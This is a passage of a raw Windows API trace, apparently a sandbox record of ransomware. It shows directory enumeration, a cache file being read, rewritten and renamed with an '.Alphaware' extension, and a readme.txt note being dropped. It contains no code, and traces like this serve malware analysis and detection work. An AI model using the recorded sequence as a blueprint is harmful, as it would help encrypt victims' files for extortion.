lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0094.276] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.276] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0094.276] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.277] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.277] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.277] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.278] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.278] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.278] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.279] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x74e7e660, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0094.279] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.279] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", dwFileAttributes=0x80) returned 1 [0094.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.280] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x2458f20 | out: lpFileInformation=0x2458f20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x74e7e660, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0094.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.281] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.281] GetFileType (hFile=0x250) returned 0x1 [0094.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.281] GetFileType (hFile=0x250) returned 0x1 [0094.281] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x40000 [0094.282] ReadFile (in: hFile=0x250, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23e958*=0x40000, lpOverlapped=0x0) returned 1 [0094.293] CloseHandle (hObject=0x250) returned 1 [0094.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.344] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.347] GetFileType (hFile=0x250) returned 0x1 [0094.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.347] GetFileType (hFile=0x250) returned 0x1 [0094.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.365] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a70bd40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x55634)) returned 1 [0094.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.365] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat.alphaware")) returned 1 [0094.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0094.366] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.367] GetFileType (hFile=0x250) returned 0x1 [0094.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0094.367] GetFileType (hFile=0x250) returned 0x1 [0094.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a70bd40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a70bd40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a70bd40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x55634, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.Alphaware", cAlternateFileName="INDEXD~1.ALP")) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a70bd40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a70bd40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a731ea0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a70bd40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a70bd40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a731ea0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0094.369] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.370] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.370] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.370] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.370] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.371] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e870f40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e819100, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e81b810, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e873650, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e875d60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0094.371] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e840200, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e842910, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0094.372] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e8624e0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e864bf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xde2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0094.372] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0094.372] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.372] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini", dwFileAttributes=0x80) returned 1 [0094.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.373] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24dc258 | out: lpFileInformation=0x24dc258*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e870f40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x112)) returned 1 [0094.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.374] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.374] GetFileType (hFile=0x250) returned 0x1 [0094.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.374] GetFileType (hFile=0x250) returned 0x1 [0094.374] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x112 [0094.374] ReadFile (in: hFile=0x250, lpBuffer=0x24dc630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc630*, lpNumberOfBytesRead=0x23e958*=0x112, lpOverlapped=0x0) returned 1 [0094.375] CloseHandle (hObject=0x250) returned 1 [0094.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.402] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.403] GetFileType (hFile=0x250) returned 0x1 [0094.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.404] GetFileType (hFile=0x250) returned 0x1 [0094.405] SetThreadErrorMode 